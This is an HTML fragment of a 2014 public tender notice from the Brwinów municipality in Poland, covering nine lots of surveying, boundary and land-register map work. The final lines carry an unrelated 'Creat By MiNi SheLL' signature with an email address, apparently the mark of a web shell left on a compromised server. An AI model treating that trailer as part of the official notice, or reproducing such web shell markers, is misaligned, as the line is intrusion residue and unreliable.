5) Jeżeli Wykonawca, wykazując spełnianie warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
a) zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1) zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2) zmiany podmiotu trzeciego (podwykonawcy), na którego zasobach Wykonawca potwierdził spełnianie warunków udziału w postępowaniu o udzielenie niniejszego zamówienia publicznego, a nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca, 
3) zmiany podwykonawców zgłoszonych przez Wykonawców według postanowień § 8 umowy,
4) jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW, 05-840 BRWINÓW UL. KOŚCIUSZKI 4A, pokój nr 22, Zespół ds. Zamówień Publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2014 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW, 05-840 BRWINÓW, ul. GRODZISKA 12, Biuro Obsługi Interesanta - pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sporządzanie map do zasiedzenia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część I. Sporządzenie map do zasiedzenia:
Zadanie 1. nieruchomości położonej w Brwinowie obr. 17, oznaczonej jako działka nr ew. 34.
Zadanie 2. nieruchomości innych niż wskazana w zadaniu 1.
Do każdego opracowania należy dołączyć (zadanie 1 i 2 ):
- odbitki w ilości 5 szt.,
- badania hipoteczne (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów oraz nr kart w przypadku starych ksiąg lub Zbiorów Dokumentów, na których wpisano lub załączono tytuły własności),
- kopię protokołu granicznego,
- kopię wykazu zmian gruntowych
Maksymalna  ilość opracowań dla  zadania 2. w okresie obowiązywania umowy - dla 3 działek.
2. Przedmioty zamówienia określone w częściach I - IX w ust.1 muszą być wykonane zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz.U. z 2010r. Nr 102 poz. 651 ze zm.) i ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193 poz. 1287 ze zm.).
3. Na wykonany przedmiot zamówienia Wykonawca udziela co najmniej 36-miesięcznej rękojmi za wady, na dokonanie poprawek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sporządzenie map do komunalizacji:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część II. Sporządzenie map do komunalizacji:
Zadanie 1. nieruchomości położonej w miejscowości Grudów, oznaczonej w ewidencji gruntów jako działka nr 11/1.
Zadanie 2. nieruchomości położonej w Brwinowie obr. 21, oznaczonej w ewidencji gruntów jako działki nr 178/1 część i 192/5, stanowiące ul. Leśnej Polany i ul. Jodłową.
Zadanie 3. nieruchomości położonej w Brwinowie obr. 17, oznaczonej w ewidencji gruntów jako działka nr 194/6, stanowiącej ul. Kościuszki.
Zadanie 4. nieruchomości położonej w Brwinowie obr. 18, oznaczonej w ewidencji gruntów jako działka nr 34, stanowiącej ul. Stalową.
Zadanie 5.  dla nieruchomości innych niż wymienione w zadaniach od 1 do 4 . 
Do każdego opracowania należy dołączyć (zadanie 1-5):
- odbitki w ilości 5 szt.,
- badania hipoteczne (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów oraz nr kart w przypadku starych ksiąg lub Zbiorów Dokumentów, na których wpisano lub załączono tytuły własności),
- kopię protokołu granicznego,
- kopię wykazu zmian gruntowych
Maksymalna  ilość  opracowań dla  zadania 5  w okresie obowiązywania umowy - dla 5 działek.
2. Przedmioty zamówienia określone w częściach I - IX w ust.1 muszą być wykonane zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz.U. z 2010r. Nr 102 poz. 651 ze zm.) i ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193 poz. 1287 ze zm.).
3. Na wykonany przedmiot zamówienia Wykonawca udziela co najmniej 36-miesięcznej rękojmi za wady, na dokonanie poprawek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sporządzenie map do regulacji stanu prawnego dróg gminnych (art. 73 ustawy z dnia 13 października 1998r. Przepisy wprowadzające ustawy reformujące administrację publiczną Dz.U. z 1998r. Nr 133, poz. 872 ze zm.):.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część III. Sporządzenie map do regulacji stanu prawnego dróg gminnych (art. 73 ustawy z dnia 13 października 1998r. Przepisy wprowadzające ustawy reformujące administrację publiczną Dz.U. z 1998r. Nr 133, poz. 872 ze zm.):
Zadanie 1. dla nieruchomości stanowiącej ul. Józefowską w miejscowości Krosna-Wieś, obecnie składającej się, wg ewidencji gruntów, z działki nr 96, na odcinku pomiędzy działkami o nr ew. 97 do 103 - 14 hektometrów.
Zadanie 2. dla nieruchomości stanowiącej ul. Marianka w miejscowości Krosna-Wieś, na odcinku obecnie składającym się, wg ewidencji gruntów, z działki nr 102 - 8 hektometrów.
Zadanie 3. dla nieruchomości stanowiącej ul. Kazimierzowską w miejscowości Owczarnia, na odcinku obecnie składającym się, wg ewidencji gruntów, z działki nr 129/2 - 2 hektometry.
Zadanie 4. dla nieruchomości wchodzących w skład ul. Łokietka w miejscowości Owczarnia, stanowiących obecnie, wg ewidencji gruntów, działki nr 77/13, 77/7 i 77/17 (na odcinku pomiędzy działkami nr ew. 77/16 do 41/6) - 3 hektometry.
Zadanie 5. dla nieruchomości wchodzących w skład ul. Słonecznej w miejscowości Otrębusy, stanowiących obecnie, wg ewidencji gruntów, działki nr 343/2, 345/11, 353/2, 356/7, 356/8 i 599 - 1 hektometr.
Zadanie 6. dla nieruchomości stanowiącej ul. Łosia w miejscowości Otrębusy, obecnie składającej się, wg ewidencji gruntów, z działki nr 248/1 - 3 hektometry.
Zadanie 7. dla nieruchomości stanowiącej ul. Przejazdową w miejscowości Otrębusy, obecnie składającej się, wg ewidencji gruntów z działki nr 260 -  4 hektometry.
Zadanie 8. dla nieruchomości stanowiącej ul. Szczęsną w miejscowości Kanie, obecnie składającej się, wg ewidencji gruntów, z działki nr 919 - 1 hektometr.
Zadanie 9. dla nieruchomości stanowiących ul. Otrębuską w Brwinowie obr. 18, składającej się obecnie, wg ewidencji gruntów z działek nr 35/2 i 35/1 oraz w Brwinowie obr. 21 składającej się wg ewidencji gruntów z działek nr 108/8, 108/7, 178/1część i 179/1 - 8 hektometrów.
Zadanie 10. dla nieruchomości stanowiących ul. Kępińską w Brwinowie obr. 20, obecnie składającej się, wg ewidencji gruntów, z działki nr 254/1, na odcinku pomiędzy działkami o nr 1/9 do 86 (ul. Raszyńska) - 5 hektometrów.
Zadanie 11.	dla nieruchomości stanowiących ul. Lilpopa w Brwinowie obr. 19, obecnie składającej się wg ewidencji gruntów z działek nr 56/4 i 56/5 oraz w Brwinowie obr. 20, obecnie składającej się, wg ewidencji gruntów, z działki nr 137/7 - 19 hektometrów.
Zadanie 12. dla nieruchomości stanowiących ul. Zamkową w Brwinowie obr. 20, obecnie składającej się, wg ewidencji gruntów, z działki nr 230 i w Otrębusach składającej się z części działki nr 137/10 - 1 hektometr.
Zadanie 13.dla nieruchomości innych niż wymienione w punktach od 1 do 12.
Maksymalna  ilość  opracowań dla  zadania 13  w okresie obowiązywania umowy - 10 (łącznie opracowania obejmować będą maksymalnie 10 hektometrów).
Do każdego opracowania należy dołączyć (zadania 1-13):
- odbitki w ilości 5 szt.
- badania hipoteczne (2 egz. wszystkie działy z podaniem numerów wniosków i podstawy wpisów). Dla nieruchomości opisanych w dawnych księgach hipotecznych należy podać stronę (od-do), na której uwidoczniony jest tytuł prawny do nieruchomości .W przypadku, gdy część działki została odłączona należy wykonać szkic historyczny nieruchomości z oznaczeniem zajętości pod drogę na dzień 31.12.1998r.
- kopię protokołu ustalenia zajęcia pod drogę publiczną na dzień 31.12.1998r.
- wykaz nieruchomości zajętych pod drogi publiczne z podaniem właścicieli i ich adresów,
- wykaz zmian gruntowych.
2. Przedmioty zamówienia określone w częściach I - IX w ust.1 muszą być wykonane zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz.U. z 2010r. Nr 102 poz. 651 ze zm.) i ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193 poz. 1287 ze zm.).
3. Na wykonany przedmiot zamówienia Wykonawca udziela co najmniej 36-miesięcznej rękojmi za wady, na dokonanie poprawek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rozgraniczenie nieruchomości, zgodnie z ustawą z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193, poz. 1287ze zm.)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część IV. Rozgraniczenie nieruchomości, zgodnie z ustawą z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193, poz. 1287ze zm.).
Maksymalna  ilość  opracowań  w okresie obowiązywania umowy- 20 działek.
2. Przedmioty zamówienia określone w częściach I - IX w ust.1 muszą być wykonane zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz.U. z 2010r. Nr 102 poz. 651 ze zm.) i ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193 poz. 1287 ze zm.).
3. Na wykonany przedmiot zamówienia Wykonawca udziela co najmniej 36-miesięcznej rękojmi za wady, na dokonanie poprawek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wyznaczenie punktów granicznych nieruchomości z ewentualnym wykazem zmian gruntowych oraz stabilizacją punktów granicznych prętem metalowym i protokołem okazania granic..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część V. Wyznaczenie punktów granicznych nieruchomości z ewentualnym wykazem zmian gruntowych oraz stabilizacją punktów granicznych prętem metalowym i protokołem okazania granic.
Maksymalna  ilość opracowań  w okresie obowiązywania umowy- 70 punktów.

2. Przedmioty zamówienia określone w częściach I - IX w ust.1 muszą być wykonane zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz.U. z 2010r. Nr 102 poz. 651 ze zm.) i ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193 poz. 1287 ze zm.).
3. Na wykonany przedmiot zamówienia Wykonawca udziela co najmniej 36-miesięcznej rękojmi za wady, na dokonanie poprawek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Podział nieruchomości (w tym wstępny projekt podziału i sporządzenie mapy z projektowanym podziałem nieruchomości) wraz ze stabilizacją punktów granicznych prętem metalowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część VI. Podział nieruchomości (w tym wstępny projekt podziału i sporządzenie mapy z projektowanym podziałem nieruchomości) wraz ze stabilizacją punktów granicznych prętem metalowym
Zadanie 1. Podział nieruchomości położonych w miejscowości Kanie, oznaczonych w ewidencji gruntów jako działki nr 401/1, 401/2, 401/3, 402 i 403/4, z przeznaczeniem na ul. Poranną.
Zadanie 2. Podział nieruchomości położonych w miejscowości Otrębusy, oznaczonych w ewidencji gruntów jako działki nr 569/2, 569/3, 569/4, 569/5, 570/21, z przeznaczeniem na ul. Poranną, zgodnie ze wstępnym projektem podziału będącym w posiadaniu urzędu.
Zadanie 3. Podział nieruchomości położonej w miejscowości Żółwin, oznaczonej w ewidencji gruntów jako działka nr 22/57, z przeznaczeniem na poszerzenie ul. Szkolnej.
Zadanie 4. Podział nieruchomości położonej w miejscowości Domaniew, oznaczonej w ewidencji gruntów jako działka nr 132/12, na 5 działek.
Zadanie 5. Podział nieruchomości innych niż określone w zadaniach od 1do 4.
Maksymalna  ilość  opracowań  dla zadania 5 w okresie obowiązywania umowy - 20 działek.
2. Przedmioty zamówienia określone w częściach I - IX w ust.1 muszą być wykonane zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz.U. z 2010r. Nr 102 poz. 651 ze zm.) i ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193 poz. 1287 ze zm.).
3. Na wykonany przedmiot zamówienia Wykonawca udziela co najmniej 36-miesięcznej rękojmi za wady, na dokonanie poprawek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonanie wykazu zmian gruntowych wraz ze wskazaniem punktów granicznych z załącznikiem graficznym, dotyczącego użytków wraz z protokołem wyznaczenia granic oraz stabilizacją prętami metalowymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część VII. Wykonanie wykazu zmian gruntowych wraz ze wskazaniem punktów granicznych z załącznikiem graficznym, dotyczącego użytków wraz z protokołem wyznaczenia granic oraz stabilizacją prętami metalowymi:
Maksymalna  ilość  opracowań  w okresie obowiązywania umowy - 14 (łącznie opracowania obejmować będą maksymalnie 14 hektometrów).

2. Przedmioty zamówienia określone w częściach I - IX w ust.1 muszą być wykonane zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz.U. z 2010r. Nr 102 poz. 651 ze zm.) i ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193 poz. 1287 ze zm.).
3. Na wykonany przedmiot zamówienia Wykonawca udziela co najmniej 36-miesięcznej rękojmi za wady, na dokonanie poprawek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wykonanie opracowania w celu doprowadzenia do zgodności zapisów w księdze wieczystej i ewidencji gruntów dla nieruchomości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część VIII. Wykonanie opracowania w celu doprowadzenia do zgodności zapisów w księdze wieczystej i ewidencji gruntów dla nieruchomości:
Zadanie 1. położonych w Brwinowie obr. 6, oznaczonych w ewidencji gruntów jako działki nr 209/1, 209/2 i 209/3, stanowiące ul. Wigusin oraz działki ewidencyjnej nr 195, stanowiącej ul. Skudro.
Zadanie 2. położonej w Brwinowie obr. 15, oznaczonej w ewidencji gruntów jako działka nr 14, stanowiąca ul. Wspólną.
Zadanie 3. dla nieruchomości innych niż wymienione w pkt. 1 i 2.
Maksymalna ilość opracowań dla zadania 3 w okresie obowiązywania umowy - 10 (łącznie opracowania obejmować będą maksymalnie 10 hektometrów).

2. Przedmioty zamówienia określone w częściach I - IX w ust.1 muszą być wykonane zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz.U. z 2010r. Nr 102 poz. 651 ze zm.) i ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193 poz. 1287 ze zm.).
3. Na wykonany przedmiot zamówienia Wykonawca udziela co najmniej 36-miesięcznej rękojmi za wady, na dokonanie poprawek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wykonanie opracowania mającego na celu doprowadzenie do uregulowania stanu prawnego nieruchomości położonych w miejscowościach Moszna-Wieś - działki nr ew. 299/89, 299/5, 120/10 i Moszna-Parcela - działka nr 51/19..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część IX. Wykonanie opracowania mającego na celu doprowadzenie do uregulowania stanu prawnego nieruchomości położonych w miejscowościach Moszna-Wieś - działki nr ew. 299/89, 299/5, 120/10 i Moszna-Parcela - działka nr 51/19.

2. Przedmioty zamówienia określone w częściach I - IX w ust.1 muszą być wykonane zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz.U. z 2010r. Nr 102 poz. 651 ze zm.) i ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193 poz. 1287 ze zm.).
3. Na wykonany przedmiot zamówienia Wykonawca udziela co najmniej 36-miesięcznej rękojmi za wady, na dokonanie poprawek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com